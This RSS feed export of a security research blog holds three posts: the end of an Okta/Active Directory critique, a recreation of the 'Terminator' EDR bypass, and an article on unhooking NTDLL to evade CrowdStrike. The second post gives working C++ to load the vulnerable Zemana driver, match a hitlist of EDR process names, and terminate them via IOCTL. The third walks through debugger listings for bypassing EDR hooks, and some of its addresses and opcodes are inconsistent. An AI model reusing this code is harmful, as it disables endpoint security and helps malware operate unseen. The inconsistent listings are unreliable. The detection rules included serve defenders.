<span class="hljs-variable">$Context</span> = <span class="hljs-built_in">New-Object</span> System.DirectoryServices.AccountManagement.PrincipalContext([<span class="hljs-type">System.DirectoryServices.AccountManagement.ContextType</span>]::Domain, <span class="hljs-variable">$Domain</span>)

<span class="hljs-comment"># Validate the credentials</span>
<span class="hljs-variable">$IsValid</span> = <span class="hljs-variable">$Context</span>.ValidateCredentials(<span class="hljs-variable">$Username</span>, <span class="hljs-variable">$Password</span>)

<span class="hljs-keyword">if</span> (<span class="hljs-variable">$IsValid</span>) {
    <span class="hljs-built_in">Write-Host</span> <span class="hljs-string">"The credentials are valid."</span>
}
<span class="hljs-keyword">else</span> {
    <span class="hljs-built_in">Write-Host</span> <span class="hljs-string">"The credentials are not valid."</span>
}
</code></pre>
<p>It's possible that they injected a DLL to hook the function obtaining data from Okta. This can occur post-TLS decryption, letting them sniff the data in the agent. Then, the Okta Agent employs a Windows API function to update the user's domain details, using the native API to generate a hash and input it into the active directory domain.</p>
<h2 id="heading-insecure-by-design">Insecure by Design</h2>
<p>Okta has compromised security measures to cater to large enterprises, which isn't necessarily an uncommon thing. However, by enabling integration with Active Directory, Okta has inherited the security weaknesses that come with AD environments.</p>
<p>Active Directory in corporate networks is one of the leading providers of tech debt, and honestly, new corporations if possible should stay clear of it.</p>
<p>In the functioning of Active Directory (AD), domain-connected computers necessitate the exposure of certain firewall ports to facilitate essential communications and operations. However, this comes with the risk of opening potential gateways for unauthorized entries.</p>
<p>Active Directory's use of Group Policy Objects (GPO), used for central management of network computers, can offer control over network policies to attackers by dictating policies across the network. Additionally, the local caching of credentials, a common practice in Windows systems integrated with AD, can be another access point for attackers to extract vital credentials and facilitate lateral movement across the network.</p>
<p>Active Directory is also a repository of valuable network information, including intricate details about users, groups, and computers, which can turn into a gold mine for attackers.</p>
<p>Service Principal Names (SPNs), indicative of the services running on the network, can also be scanned to locate high-value targets, providing attackers with a blueprint to orchestrate well-planned attacks.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1694884460074/8e73403f-d018-4fe1-b16d-d20eaf023869.png" alt class="image--center mx-auto" /></p>
<p>AD’s support for older protocols and technologies, albeit to maintain compatibility with outdated systems, creates several security challenges. The continued support for the less secure NTLM alongside Kerberos is one such example. This support enlarges the scope for attackers, offering them opportunities to exploit known vulnerabilities in NTLM.</p>
<p>The shift towards a SaaS-first IdP system is increasingly recognized as a robust strategy to enhance security, with SSO and SCIM (System for Cross-domain Identity Management) allowing systems to offer seamless experiences without inheriting the vulnerabilities prevalent in traditional Active Directory environments.</p>
]]></content:encoded></item><item><title><![CDATA[Recreating the RAMP Forum EDR Bypass]]></title><description><![CDATA[Cover Illustration by mocapoca_

Last month, a guy named spyboy began advertising an EDR evasion tool for the Windows operating system via the Russian-language forum RAMP. The author claims that the software, called “Terminator”, can bypass leading E...]]></description><link>https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass</link><guid isPermaLink="true">https://research.meekolab.com/recreating-the-ramp-forum-edr-bypass</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 05 Jul 2023 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1687669141971/ae61f675-116c-48e0-8f76-9ec2873cbdef.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><em>Cover Illustration by mocapoca_</em></p>
</blockquote>
<p>Last month, a guy named <code>spyboy</code> began advertising an EDR evasion tool for the Windows operating system via the Russian-language forum RAMP. The author claims that the software, called “Terminator”, can bypass leading EDR/AV with the software being sold from $300 for the bypass of a single EDR solution and up to $3,000 for the targeting of all EDR solutions listed.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1685809995801/9d82b927-902f-4240-86f3-d30674f4917f.png" alt class="image--center mx-auto" /></p>
<p>While Twitter had a meltdown for a total of two days, insight from Crowdstrike that was <a target="_blank" href="https://www.reddit.com/r/crowdstrike/comments/13wjrgn/20230531_situational_awareness_spyboy_defense/">shared</a> on Reddit revealed that Terminator is less sophisticated than the entire infosec community initially thought.</p>
<p>The tool drops a signed Zemana Anti-Malware kernel driver (zamguard64.sys or zam64.sys) into the <code>C:\\Windows\\System32</code> folders with a randomly generated name between 4 and 10 characters. Both of these drivers are well exploited, first showing up as <a target="_blank" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-31728">CVE-2021-31728</a> which is a specific flaw inside MalwareFox Anti-Malware (a rebrand of Zemana Anti-Malware) that allows a non-privileged process to manipulate the driver and gain Ring 0 privileges. IOCTL calls that are interesting can be found on this <a target="_blank" href="https://gist.github.com/hfiref0x/e116dcf7e99b8d5d36c333a1f1048916">gist</a>.</p>
<p>Firstly, we would need to mount the driver by opening a handle to the Windows SCM database and starting the Zemana Antimalware Service (zam64.sys).</p>
<pre><code class="lang-cpp"><span class="hljs-function">BOOL <span class="hljs-title">loadDriver</span><span class="hljs-params">(<span class="hljs-keyword">char</span>* driverPath)</span> </span>{
    SC_HANDLE hSCM = OpenSCManager(<span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, SC_MANAGER_ALL_ACCESS);
    <span class="hljs-keyword">if</span> (!hSCM) <span class="hljs-keyword">return</span> FALSE;

    SC_HANDLE hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS);
    <span class="hljs-keyword">if</span> (hService) {
        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Service already exists.\n"</span>);
        SERVICE_STATUS serviceStatus;
        <span class="hljs-keyword">if</span> (QueryServiceStatus(hService, &amp;serviceStatus) &amp;&amp; serviceStatus.dwCurrentState == SERVICE_STOPPED) {
            <span class="hljs-keyword">if</span> (!StartServiceA(hService, <span class="hljs-number">0</span>, <span class="hljs-literal">nullptr</span>)) {
                CloseServiceHandle(hService);
                CloseServiceHandle(hSCM);
                <span class="hljs-keyword">return</span> FALSE;
            }
            <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Starting service...\n"</span>);
        }
        CloseServiceHandle(hService);
    }
</code></pre>
<p>We can then define a hitlist of EDR processes we wanna target and search for them.</p>
<pre><code class="lang-cpp"><span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* <span class="hljs-keyword">const</span> g_edrlist[] = {
    <span class="hljs-string">"activeconsole"</span>, <span class="hljs-string">"anti malware"</span>,    <span class="hljs-string">"anti-malware"</span>,
    <span class="hljs-string">"antimalware"</span>,   <span class="hljs-string">"anti virus"</span>,      <span class="hljs-string">"anti-virus"</span>,
    <span class="hljs-string">"antivirus"</span>,     <span class="hljs-string">"appsense"</span>,        <span class="hljs-string">"authtap"</span>,
    <span class="hljs-string">"avast"</span>,         <span class="hljs-string">"avecto"</span>,          <span class="hljs-string">"canary"</span>,
    <span class="hljs-string">"carbonblack"</span>,   <span class="hljs-string">"carbon black"</span>,    <span class="hljs-string">"cb.exe"</span>,
    <span class="hljs-string">"ciscoamp"</span>,      <span class="hljs-string">"cisco amp"</span>,       <span class="hljs-string">"countercept"</span>,
    <span class="hljs-string">"countertack"</span>,   <span class="hljs-string">"cramtray"</span>,        <span class="hljs-string">"crssvc"</span>,
    <span class="hljs-string">"crowdstrike"</span>,   <span class="hljs-string">"csagent"</span>,         <span class="hljs-string">"csfalcon"</span>,
    <span class="hljs-string">"csshell"</span>,       <span class="hljs-string">"cybereason"</span>,      <span class="hljs-string">"cyclorama"</span>,
    <span class="hljs-string">"cylance"</span>,       <span class="hljs-string">"cyoptics"</span>,        <span class="hljs-string">"cyupdate"</span>,
    <span class="hljs-string">"cyvera"</span>,        <span class="hljs-string">"cyserver"</span>,        <span class="hljs-string">"cytray"</span>,
    <span class="hljs-string">"darktrace"</span>,     <span class="hljs-string">"defendpoint"</span>,     <span class="hljs-string">"defender"</span>,
    <span class="hljs-string">"eectrl"</span>,        <span class="hljs-string">"elastic"</span>,         <span class="hljs-string">"endgame"</span>,
    <span class="hljs-string">"f-secure"</span>,      <span class="hljs-string">"forcepoint"</span>,      <span class="hljs-string">"fireeye"</span>,
    <span class="hljs-string">"groundling"</span>,    <span class="hljs-string">"GRRservic"</span>,       <span class="hljs-string">"inspector"</span>,
    <span class="hljs-string">"ivanti"</span>,        <span class="hljs-string">"kaspersky"</span>,       <span class="hljs-string">"lacuna"</span>,
    <span class="hljs-string">"logrhythm"</span>,     <span class="hljs-string">"malware"</span>,         <span class="hljs-string">"mandiant"</span>,
    <span class="hljs-string">"mcafee"</span>,        <span class="hljs-string">"morphisec"</span>,       <span class="hljs-string">"msascuil"</span>,
    <span class="hljs-string">"msmpeng"</span>,       <span class="hljs-string">"nissrv"</span>,          <span class="hljs-string">"omni"</span>,
    <span class="hljs-string">"omniagent"</span>,     <span class="hljs-string">"osquery"</span>,         <span class="hljs-string">"palo alto networks"</span>,
    <span class="hljs-string">"pgeposervice"</span>,  <span class="hljs-string">"pgsystemtray"</span>,    <span class="hljs-string">"privilegeguard"</span>,
    <span class="hljs-string">"procwall"</span>,      <span class="hljs-string">"protectorservic"</span>, <span class="hljs-string">"qradar"</span>,
    <span class="hljs-string">"redcloak"</span>,      <span class="hljs-string">"secureworks"</span>,     <span class="hljs-string">"securityhealthservice"</span>,
    <span class="hljs-string">"semlaunchsv"</span>,   <span class="hljs-string">"sentinel"</span>,        <span class="hljs-string">"sepliveupdat"</span>,
    <span class="hljs-string">"sisidsservice"</span>, <span class="hljs-string">"sisipsservice"</span>,   <span class="hljs-string">"sisipsutil"</span>,
    <span class="hljs-string">"smc.exe"</span>,       <span class="hljs-string">"smcgui"</span>,          <span class="hljs-string">"snac64"</span>,
    <span class="hljs-string">"sophos"</span>,        <span class="hljs-string">"splunk"</span>,          <span class="hljs-string">"srtsp"</span>,
    <span class="hljs-string">"symantec"</span>,      <span class="hljs-string">"symcorpu"</span>,        <span class="hljs-string">"symefasi"</span>,
    <span class="hljs-string">"sysinternal"</span>,   <span class="hljs-string">"sysmon"</span>,          <span class="hljs-string">"tanium"</span>,
    <span class="hljs-string">"tda.exe"</span>,       <span class="hljs-string">"tdawork"</span>,         <span class="hljs-string">"tpython"</span>,
    <span class="hljs-string">"vectra"</span>,        <span class="hljs-string">"wincollect"</span>,      <span class="hljs-string">"windowssensor"</span>,
    <span class="hljs-string">"wireshark"</span>,     <span class="hljs-string">"threat"</span>,          <span class="hljs-string">"xagt.exe"</span>,
    <span class="hljs-string">"xagtnotif.exe"</span> ,<span class="hljs-string">"mssense"</span> };

<span class="hljs-keyword">int</span> g_edrlistSize = <span class="hljs-keyword">sizeof</span>(g_edrlist) / <span class="hljs-keyword">sizeof</span>(g_edrlist[<span class="hljs-number">0</span>]);

<span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">isInEdrlist</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* pn)</span> </span>{
    <span class="hljs-keyword">char</span>* tempv = toLowercase(pn);
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; g_edrlistSize; i++) {
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(tempv, g_edrlist[i]) != <span class="hljs-literal">NULL</span>) {
            <span class="hljs-built_in">free</span>(tempv);
            <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;
        }
    }
    <span class="hljs-built_in">free</span>(tempv);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Once we have the handle to the device, we send an IOCTL request with the code <code>0x80002010</code> to register ourselves with the driver. This IOCTL call adds a requester process id to the list of trusted processes and must be called first before calling other IOCTLs).</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">isInEdrlist</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span>* pn)</span> </span>{
    <span class="hljs-keyword">char</span>* tempv = toLowercase(pn);
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; g_edrlistSize; i++)
        <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strstr</span>(tempv, g_edrlist[i])) { <span class="hljs-built_in">free</span>(tempv); <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>; }
    <span class="hljs-built_in">free</span>(tempv);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;
}
</code></pre>
<p>Next we can capture a snapshot of all the processes currently active on the system using the <code>CreateToolhelp32Snapshot</code> function. This snapshot serves as a holistic view of the system's running processes, allowing for a systematic evaluation of each one. Subsequently, the function iterates over each process in this snapshot using a combination of <code>Process32First</code> and <code>Process32Next</code>.</p>
<p>As each process is accessed, its name is compared against the predefined list of known EDR processes using the <code>isInEdrlist</code> function. If a match is identified, indicating that the process could be an active EDR solution, it will be terminated using the <code>DeviceIoControl</code> function.</p>
<pre><code class="lang-cpp"><span class="hljs-function">DWORD <span class="hljs-title">checkEDRProcesses</span><span class="hljs-params">(HANDLE hDevice)</span> </span>{
    <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> procId, ecount = <span class="hljs-number">0</span>;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, <span class="hljs-number">0</span>);
    <span class="hljs-keyword">if</span> (hSnap == INVALID_HANDLE_VALUE) <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;

    PROCESSENTRY32 pE = { <span class="hljs-keyword">sizeof</span>(pE) };
    <span class="hljs-keyword">if</span> (Process32First(hSnap, &amp;pE)) {
        <span class="hljs-keyword">do</span> {
            <span class="hljs-keyword">char</span> exeName[MAX_PATH];
            wcstombs(exeName, pE.szExeFile, MAX_PATH);
            <span class="hljs-keyword">if</span> (isInEdrlist(exeName) &amp;&amp; 
                !DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &amp;(procId = pE.th32ProcessID),
                                 <span class="hljs-keyword">sizeof</span>(procId), <span class="hljs-literal">NULL</span>, <span class="hljs-number">0</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>)) ecount++;
        } <span class="hljs-keyword">while</span> (Process32Next(hSnap, &amp;pE));
    }
    CloseHandle(hSnap);
    <span class="hljs-keyword">return</span> ecount;
</code></pre>
<p>Bring Your Own Vulnerable Driver (BYOVD) attacks are becoming a more common entry point for malware builders to exploit, and the way to do it isn’t even really that complicated since making IOCTL calls isn’t rocket science.</p>
<p>While there are solutions such as the <a target="_blank" href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md">Microsoft HVCI Driver Blocklist</a>, it’s still updated only <a target="_blank" href="https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules">1-2 times</a> per year. This is why Windows hasn’t revoked the certificate validity of the driver and also major EDR vendors haven't caught up to the issue.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1685810016505/054ab980-2b4b-465a-a736-c4863e84361e.png" alt class="image--center mx-auto" /></p>
<p>Only one security vendor was able to detect the solution, Elastic EDR, which has an <a target="_blank" href="https://github.com/elastic/protections-artifacts">open-source ruleset</a> for the driver (an absolute win for OSS btw). The fact that Elastic EDR wasn't mentioned in the RAMP forum post also says something about the importance of keeping driver blocklists up-to-date.</p>
<pre><code class="lang-python">rule Windows_VulnDriver_Zam_928812a7 {
    meta:
        author = <span class="hljs-string">"Elastic Security"</span>
        id = <span class="hljs-string">"928812a7-ac7c-47cf-9111-11470b661d46"</span>
        fingerprint = <span class="hljs-string">"8e5db0d4fee806538929680e7d3521b111b0e09fcc3eba3c191f6787375999cc"</span>
        creation_date = <span class="hljs-string">"2022-04-04"</span>
        last_modified = <span class="hljs-string">"2022-04-04"</span>
        threat_name = <span class="hljs-string">"Windows.VulnDriver.Zam"</span>
        reference_sample = <span class="hljs-string">"543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91"</span>
        severity = <span class="hljs-number">50</span>
        arch_context = <span class="hljs-string">"x86"</span>
        scan_context = <span class="hljs-string">"file"</span>
        license = <span class="hljs-string">"Elastic License v2"</span>
        os = <span class="hljs-string">"windows"</span>
    strings:
        $pdb_64 = <span class="hljs-string">"AntiMalware\\\\bin\\\\zam64.pdb"</span>
        $pdb_32 = <span class="hljs-string">"AntiMalware\\\\bin\\\\zam32.pdb"</span>
    condition:
        int16(uint32(<span class="hljs-number">0x3C</span>) + <span class="hljs-number">0x5c</span>) == <span class="hljs-number">0x0001</span> <span class="hljs-keyword">and</span> any of ($pdb_*)
}
</code></pre>
<p>As these attacks become more common, the way EDR/AVs detect and block drivers need to be accelerated. Open-source projects such as LOLDrivers have thousands of vulnerable drivers, with hundreds that aren’t in the HVCI blocklist, and they also offer open-source <a target="_blank" href="https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml">YARA rules</a> for detection functions.</p>
]]></content:encoded></item><item><title><![CDATA[Evading EDRs by Unhooking NTDLL In-Memory]]></title><description><![CDATA[EDR (Endpoint Detection and Response) hooking is a well-known technique used in cybersecurity, and there are many examples available online of unhooking NTDLL (NT Dynamic Link Library), often using direct syscalls or mapping of NTDLL from disk or kno...]]></description><link>https://research.meekolab.com/evading-edrs-by-unhooking-ntdll-in-memory</link><guid isPermaLink="true">https://research.meekolab.com/evading-edrs-by-unhooking-ntdll-in-memory</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Thu, 13 Apr 2023 07:40:15 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1686025454180/15af63b4-2002-4cc7-b280-dba9c932af0b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>EDR (Endpoint Detection and Response) hooking is a well-known technique used in cybersecurity, and there are many examples available online of unhooking NTDLL (NT Dynamic Link Library), often using direct syscalls or mapping of NTDLL from disk or known dlls.</p>
<p>Many of the common methods for unhooking NTDLL, which rely on using <code>VirtualProtect</code> or <code>NtProtectVirtualMemory</code>, can fail due to the presence of hooks placed on <code>NtProtectVirtualMemory</code> itself. But this creates an issue where the unhooking operation requires calling a function that is hooked, as when <code>VirtualProtect</code> or <code>NtProtectVirtualMemory</code> is used to unhook NTDLL, the hooked function is invoked during the unhooking process, allowing the EDR/AV to detect and potentially block the operation.</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!NtProtectVirtualMemory        L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9e10b9def        jmp        00007ffe`9c340fd6
0:000&gt; u 00007ffe`e9340fd6    L1
csagent!CVCCP+0xe9f0:
00007ffe`a9a3ad60  4c8bdc           mov   r11,rsp
00007ffe`a9a3ad63  55               push  rbp
00007ffe`a9a3ad64  53               push  rbx
00007ffe`a9a3ad65  4155             push  r13
00007ffe`a9a3ad67  498dab68fdffff   lea   rbp,[r11-298h]
00007ffe`a9a3ad6e  4881ec80030000   sub   rsp,380h   
00007ffe`a9a3ad75  488b05ecd20a00   mov   rax,qword ptr [csagent!A3+0x93818 (00007ffe`a9a3ad63)]
00007ffe`a9a3ad7c  4833c4           xor   rax,rsp
</code></pre>
<p>One approach to bypassing NTDLL hooks is to use direct syscalls, where you have your own syscall stubs and issue syscalls directly from your own modules instead of relying on APIs from NTDLL. This can help avoid NTDLL hooks and prevent detection by EDR/AV systems.</p>
<p>However, it's important to note that not all NTDLL functions are syscalls. Some functions, like <code>PssNtCaptureSnapshot</code>, is not exposed as syscalls and cannot be directly invoked using this approach. This limitation can pose challenges when trying to unhook NTDLL functions that are not accessible via direct syscalls.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">uint64_t</span> <span class="hljs-title">PssNtCaptureSnapshot</span><span class="hljs-params">(<span class="hljs-keyword">int64_t</span>* arg1, <span class="hljs-keyword">int64_t</span> arg2, <span class="hljs-keyword">int32_t</span> arg3, <span class="hljs-keyword">int32_t</span> arg4)</span>
        <span class="hljs-keyword">int64_t</span> r13 </span>= <span class="hljs-function">arg2
        <span class="hljs-keyword">uint64_t</span> rax_1
        <span class="hljs-title">if</span> <span class="hljs-params">((arg3 &amp; <span class="hljs-number">0x3ff8000</span>) = <span class="hljs-number">0</span>)</span>
                rax_1 </span>= <span class="hljs-number">0xc000000d</span>
        <span class="hljs-keyword">else</span>
            <span class="hljs-keyword">int32_t</span> r15_2 = arg3 &amp; <span class="hljs-number">0x1c000000</span>
            <span class="hljs-keyword">if</span> (r15_2 == <span class="hljs-number">0x4000000</span>)
                    rax_1 = <span class="hljs-number">0xc0000030</span>
            <span class="hljs-keyword">else</span>
                <span class="hljs-keyword">int64_t</span> rbx_1 = <span class="hljs-number">0</span>
                <span class="hljs-keyword">uint64_t</span> var_68 = <span class="hljs-number">0</span>
                <span class="hljs-keyword">uint64_t</span> var_50 = <span class="hljs-number">0</span>
                <span class="hljs-keyword">int64_t</span> var_70 = <span class="hljs-number">0</span>
                <span class="hljs-keyword">int64_t</span> var_58 = <span class="hljs-number">0</span>
                <span class="hljs-keyword">int32_t</span> rsi_2 = arg3 &amp; <span class="hljs-number">0x40000000</span>
                <span class="hljs-keyword">if</span> (rsi_2 = <span class="hljs-number">0</span>)
                        rbx_1 = *<span class="hljs-number">07f</span>fe0300
                        PsspSampleCounters(&amp;var_50, &amp;var_58)
                <span class="hljs-keyword">double</span> (* rcx_2)[<span class="hljs-number">0x4</span>] = *arg1
</code></pre>
<p>Additionally, using direct syscalls may require extensive knowledge of the underlying operating system's internals, including the system call interface, which can be complex and undocumented. This can make the development and maintenance of such syscall stubs more challenging, as it may require constant updates and testing to ensure compatibility with different OS versions and security updates.</p>
<p>EDRs may also flag inline syscalls as suspicious during their monitoring process. This is because inline syscalls can be used both by legitimate software and by malicious software, and EDRs need to analyze their usage in the context of other behaviors and characteristics of the software being monitored to determine if it is indicative of potential malicious activity.</p>
<p>There is a unique solution that can be devised that is based on the fact that the original code blocks that were replaced by hooks and still live somewhere in memory, they have to as the AV/EDR may permit calls to go through if deemed legit.</p>
<p>So if we utilize in-memory disassembly to identify patterns that lead to the original (unhooked) code blocks and find the unhooked original <code>NtProtectVirtualMemory</code> function, we can use it to apply the rest of our unhooking logic to remove all EDR hooks.</p>
<p>Lets identify the patterns in Crowdstrike Falcon that lead to the original unhooked blocks:</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!NtProtectVirtualMemory        L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9e10b9def        jmp        00007ffe`9c340fd6
0:000&gt; u 00007ffe`e9340fd6    L1
csagent!CVCCP+0xe9f0:
00007ffe`a9a3ad60  4c8bdc           mov   r11,rsp
00007ffe`a9a3ad63  55               push  rbp
00007ffe`a9a3ad64  53               push  rbx
00007ffe`a9a3ad65  4155             push  r13
00007ffe`a9a3ad67  498dab68fdffff   lea   rbp,[r11-298h]
00007ffe`a9a3ad6e  4881ec80030000   sub   rsp,380h   
00007ffe`a9a3ad75  488b05ecd20a00   mov   rax,qword ptr [csagent!A3+0x93818 (00007ffe`a9a3ad63)]
00007ffe`a9a3ad7c  4833c4           xor   rax,rsp
</code></pre>
<p>In the disassembled snippet of <code>NtProtectVirtualMemory</code> function in <code>ntdll.dll</code> is hooked with a direct jump instruction (<code>jmp</code>) to an address outside of <code>ntdll.dll</code>, specifically <code>csagent!CVCCP+0xe9f0</code> in the <code>csagent.sys</code> module.</p>
<p>This suggests that the <code>NtProtectVirtualMemory</code> function has been intercepted and modified to redirect its execution to a different code path within the <code>csagent.sys</code> module, which could indicate a hook or a detour mechanism used for monitoring or modifying the behavior of the function.</p>
<p>But now how do we identify the original unhooked code blocks for a particular function? Lets look at further disassembly in csagent’s hook:</p>
<pre><code class="lang-plaintext">csagent!CVCCP+0xef02
00007ffe`a9a3b272  488b059f600b00   mov   rax,qword ptr [csagent!A3+0x9cac8 (00007ffe`a9af1318)]
00007ffe`a9a3b279  48895c2420       mov   qword ptr [rsp+20h],rbx
00007ffe`a9a3b27e  ff1564c20700     call  qword ptr [csagent!A3+0x62c98 (00007ffe`a9ab74e8)]
0:000&gt; u poi(00007ffe`a9af1318) L3
00007ffe`9c340fc0  4c8bd1           mov   r10,rcx
00007ffe`9c340fc3  b8500000000      mov   eax,50h
00007ffe`9c340fc8  ff25000000000    mov   qword ptr [00007ffe`9cab74e8]
0:000&gt; u poi(00007ffe`9caf1fce)
ntdll!NtProtectVirtualMemory+0x8:
00007ffe`a9a3b27e  fc1434c207f001   test  byte ptr [ShareUserData+0x308 (000000`7ffe0308)],1
00007ffe`a9a34000  7503             jne   ntdll!NtProtectVirtualMemory+0x15 (00007ffe`ac970405)
00007ffe`a9a34002  0f05             syscall
00007ffe`a9a34004  c3               ret
</code></pre>
<p>Further disassembly of <code>NtProtectVirtualMemory</code>, identifying the original syscall stub</p>
<p>The disassembled code reveals that there is an indirect pointer load into RAX from <code>csagent!A3+0x9cac8</code>(which is the value stored at <code>00007ffea9af1318</code>), followed by an indirect call to the pointer stored in RAX. This results in a jump to the original syscall stub for <code>NtProtectVirtualMemory</code> located in <code>ntdll!NtProtectVirtualMemory+0x8</code>(at <code>00007ffea9a3b27e</code>), which is the original, unhooked function that was replaced by the hook in <code>csagent.sys</code>.</p>
<p>This pattern is similar for non-syscall functions that are hooked, lets look at <code>PssNtCaptureSnapshot</code>:</p>
<pre><code class="lang-plaintext">0:000&gt; u ntdll!PssNtCaputreSnapshot L1
ntdll!PssNtCaptureSnapshot:
00007ffe`ac9f8e10 e9807d94ef       jmp      00007ffe`9c340b95
0:000&gt; u 00007ffe`9c340b95 L1
00007ffe`9c340b95 ff2500000000     jmp      qword ptr [00007ffe`9c340b9b]
0:000&gt; u poi(00007ffe`9c340b9b)
csagent!CVCCP+0xb410:
00007ffe`a9a37780  488bc4          mov      rax,rsp
00007ffe`a9a37783  55              push     rbp
00007ffe`a9a37784  53              push     rbx
00007ffe`a9a37785  56              push     rsi
00007ffe`a9a37786  57              push     rdi
00007ffe`a9a37787  4154            push     r12
00007ffe`a9a37789  4155            push     r13
00007ffe`a9a3778b  4156            push     r14
</code></pre>
<p>The disassembled code of <code>ntdll!PssNtCaptureSnapshot</code>shows a similar pattern with a jump followed by an indirect jump to an address outside of <code>ntdll.dll</code>, specifically to <code>csagent!CVCCP+0xb410</code>(at <code>00007ffe a9a37780</code>). This is consistent with the behavior of the hooked functions in <code>ntdll.dll</code>where the hook performs a jump followed by an indirect jump to an external location in <code>csagent.dll</code> . This pattern is a common technique used in hooking to redirect the execution flow of a function to a custom implementation in an external DLL.</p>
<pre><code class="lang-plaintext">csagent!CVCCP+0xba33:
00007ffe`a9a337da3 e9807d94ef       mov      rax,qword ptr [csagent!A3+0x9ca18 (00007ffe`a9af1268)]
00007ffe`a9a337daa e9807d94ef       call     qword ptr [csagent!A3+0x9ca98 (00007ffe`a9ab74e8)]
0:000&gt; u poi(00007ffe`a9af1268) L3
0007ffe`9ca337b80 488bc4            mov      rax,rsp
0007ffe`9ca337b83 48895808          mov      qword ptr [rax+8],rbx
0007ffe`9ca337b87 ff2500000000      jmp      qword ptr [00007ffe`9c340b8d]
0:000&gt; u poi(00007ffe`9c340b8d)
ntdll!PssNtCaptureSnapshot+0x7:
00007ffe`ac9f8e17  44894820        mov      dword ptr [rax+20h],r9d
00007ffe`ac9f8e1b  48895010        push     dword ptr [rax+10h],rdx
00007ffe`ac9f8e1f  55              push     rbp
00007ffe`ac9f8e20  56              push     rsi
00007ffe`ac9f8e20  57              push     rdi
00007ffe`ac9f8e21  4154            push     r12
00007ffe`ac9f8e24  4155            push     r13
00007ffe`ac9f8e16  4156            push     r14
</code></pre>
<p>We can observe the same pattern here where RAX is loaded with a pointer followed by an indirect call that jumps to the address stored in RAX, which is the original code block of <code>PssNtCaptureSnapshot</code> without hooks. So we can now simply identify these patterns to locate the unhooked original functions using a disassembler and translate that logic into code that uses in-memory disassembly to identify the original code blocks at runtime.</p>
<p>Once we locate the unhooked/original functions at runtime, we replace the hooks from the EDR/AV with our hook that JMPs into the unpatched originals.</p>
<pre><code class="lang-plaintext">0:001&gt; u ntdll!PssNtCaptureSnapshot L1
ntdll!PssNtCaptureSnapshot:
00007ffe`00007ffe e96b7d94ef       jmp      00007ffe`9c340b80
0:001&gt; u 00007ffe`9c340b80 L3
00007ffe`9c340b80 488bc4           mov      rax,rsp
00007ffe`9c340b83 48895808         mov      qword ptr [rax+8],rbx
00007ffe`9c340b87 ff2500000000     jmp      qword ptr [00007ffe`9c340b8d]
0:001&gt; u poi(00007ffe`9c340b8d)
ntdll!PssNtCaptureSnapshot+0x7:
00007ffe`ac9f8e17  44894820        mov      dword ptr [rax+20h],r9d
00007ffe`ac9f8e1b  48895010        mov      qword ptr [rax+10h],rdx
00007ffe`ac9f8e1f  55              push     rbp
00007ffe`ac9f8e20  56              push     rsi
00007ffe`ac9f8e21  57              push     rdi
00007ffe`ac9f8e22  4154            push     r12
00007ffe`ac9f8e24  4155            push     r13
00007ffe`ac9f8e26  4156            push     r14
0:001&gt; u ntdll!NtProtectVirtualMemory L1
ntdll!NtProtectVirtualMemory:
00007ffe`ac9703f0 e9cb0b9def       jmp      00008ffe`9c340fc0
0:001&gt; u 00007ffe`9c340fc0 L3
00007ffe`9c340fc0 4c8bd1           mov      r10,rcx
00007ffe`9c340fc3 b850000000       mov      eax,50h
00007ffe`9c349fc8 ff2500000000     jmp      qword ptr [00007ffe`9c340fce]
0:001&gt; u poi(00007ffe`9c340fce) L3
ntdll!NtProtectVirtualMemory+0x8:
00007ffe`ac9703f8 f604250803fe7f01 test     byte ptr [ShareUserData+0x308 (0000000`7ffe0308)],1
00007ffe`ac970400 7503             jne      ntdll!NtProtectVirtualMemory+0x15 (00007ffe`ac970405)
